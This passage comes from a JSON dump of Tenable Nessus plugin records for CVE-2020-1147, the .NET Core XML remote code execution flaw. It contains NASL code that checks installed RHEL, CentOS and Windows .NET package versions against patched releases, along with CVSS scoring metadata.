'content/eus/rhel8/8.6/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/sap/debug',\n 'content/eus/rhel8/8.6/x86_64/sap/os',\n 'content/eus/rhel8/8.6/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.6/x86_64/supplementary/os',\n 'content/eus/rhel8/8.6/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/appstream/debug',\n 'content/tus/rhel8/8.6/x86_64/appstream/os',\n 'content/tus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/baseos/debug',\n 'content/tus/rhel8/8.6/x86_64/baseos/os',\n 'content/tus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.6/x86_64/highavailability/os',\n 'content/tus/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/rt/os',\n 'content/tus/rhel8/8.6/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'dotnet-host-fxr-2.1-2.1.20-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-2.1-2.1.20-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1-2.1.516-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1.5xx-2.1.516-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel8/8/x86_64/appstream/debug',\n 'content/dist/rhel8/8/x86_64/appstream/os',\n 'content/dist/rhel8/8/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/baseos/debug',\n 'content/dist/rhel8/8/x86_64/baseos/os',\n 'content/dist/rhel8/8/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/codeready-builder/debug',\n 'content/dist/rhel8/8/x86_64/codeready-builder/os',\n 'content/dist/rhel8/8/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/highavailability/debug',\n 'content/dist/rhel8/8/x86_64/highavailability/os',\n 'content/dist/rhel8/8/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/nfv/debug',\n 'content/dist/rhel8/8/x86_64/nfv/os',\n 'content/dist/rhel8/8/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/resilientstorage/debug',\n 'content/dist/rhel8/8/x86_64/resilientstorage/os',\n 'content/dist/rhel8/8/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/rt/debug',\n 'content/dist/rhel8/8/x86_64/rt/os',\n 'content/dist/rhel8/8/x86_64/rt/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap-solutions/debug',\n 'content/dist/rhel8/8/x86_64/sap-solutions/os',\n 'content/dist/rhel8/8/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap/debug',\n 'content/dist/rhel8/8/x86_64/sap/os',\n 'content/dist/rhel8/8/x86_64/sap/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/supplementary/debug',\n 'content/dist/rhel8/8/x86_64/supplementary/os',\n 'content/dist/rhel8/8/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'dotnet-host-fxr-2.1-2.1.20-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-2.1-2.1.20-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1-2.1.516-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1.5xx-2.1.516-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dotnet-host-fxr-2.1 / dotnet-runtime-2.1 / dotnet-sdk-2.1 / etc');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:33:39", "description": "The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the CESA-2020:2954 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-01T00:00:00", "type": "nessus", "title": "CentOS 8 : .NET Core 3.1 (CESA-2020:2954)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:aspnetcore-runtime-3.1", "p-cpe:/a:centos:centos:aspnetcore-targeting-pack-3.1", "p-cpe:/a:centos:centos:dotnet", "p-cpe:/a:centos:centos:dotnet-apphost-pack-3.1", "p-cpe:/a:centos:centos:dotnet-host", "p-cpe:/a:centos:centos:dotnet-hostfxr-3.1", "p-cpe:/a:centos:centos:dotnet-runtime-3.1", "p-cpe:/a:centos:centos:dotnet-sdk-3.1", "p-cpe:/a:centos:centos:dotnet-targeting-pack-3.1", "p-cpe:/a:centos:centos:dotnet-templates-3.1", "p-cpe:/a:centos:centos:netstandard-targeting-pack-2.1"], "id": "CENTOS8_RHSA-2020-2954.NASL", "href": "https://www.tenable.com/plugins/nessus/145908", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2020:2954. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145908);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2954\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"CentOS 8 : .NET Core 3.1 (CESA-2020:2954)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2020:2954 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2954\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:aspnetcore-runtime-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:aspnetcore-targeting-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-apphost-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-hostfxr-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-runtime-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-sdk-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-targeting-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-templates-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:netstandard-targeting-pack-2.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'aspnetcore-runtime-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'aspnetcore-targeting-pack-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-3.1.106-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-apphost-pack-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-host-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-hostfxr-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-3.1-3.1.106-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-targeting-pack-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-templates-3.1-3.1.106-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'netstandard-targeting-pack-2.1-3.1.106-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'aspnetcore-runtime-3.1 / aspnetcore-targeting-pack-3.1 / dotnet / etc');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:33:38", "description": "The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the CESA-2020:2938 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-01T00:00:00", "type": "nessus", "title": "CentOS 8 : .NET Core (CESA-2020:2938)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:dotnet-host-fxr-2.1", "p-cpe:/a:centos:centos:dotnet-runtime-2.1", "p-cpe:/a:centos:centos:dotnet-sdk-2.1", "p-cpe:/a:centos:centos:dotnet-sdk-2.1.5xx"], "id": "CENTOS8_RHSA-2020-2938.NASL", "href": "https://www.tenable.com/plugins/nessus/145867", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2020:2938. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145867);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2938\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"CentOS 8 : .NET Core (CESA-2020:2938)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2020:2938 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2938\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-host-fxr-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-runtime-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-sdk-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dotnet-sdk-2.1.5xx\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'dotnet-host-fxr-2.1-2.1.20-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-2.1-2.1.20-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1-2.1.516-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1.5xx-2.1.516-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dotnet-host-fxr-2.1 / dotnet-runtime-2.1 / dotnet-sdk-2.1 / etc');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:37:04", "description": "The Microsoft .NET Core installation on the remote host is version 2.1.x < 2.1.20 or 3.1.x < 3.1.6. It is, therefore, affected by a remote code execution (RCE) vulnerability due to failing to check the source markup of XML file input. An unauthenticated, remote attacker can exploit this, by issuing specially crafted requests to applications that process certain types of XML, to execute arbitrary code in the context of the current user.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "Security Update for .NET Core (July 2020)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/a:microsoft:.net_core"], "id": "SMB_NT_MS20_JUL_DOTNET_CORE.NASL", "href": "https://www.tenable.com/plugins/nessus/138465", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138465);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"IAVA\", value:\"2020-A-0304-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Security Update for .NET Core (July 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a .NET Core remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Core installation on the remote host is version 2.1.x < 2.1.20 or 3.1.x < 3.1.6. It is, therefore,\naffected by a remote code execution (RCE) vulnerability due to failing to check the source markup of XML file input. An\nunauthenticated, remote attacker can exploit this, by issuing specially crafted requests to applications that process\ncertain types of XML, to execute arbitrary code in the context of the current user.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?43ad1c2a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/159\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to vendor documentation.\");\n 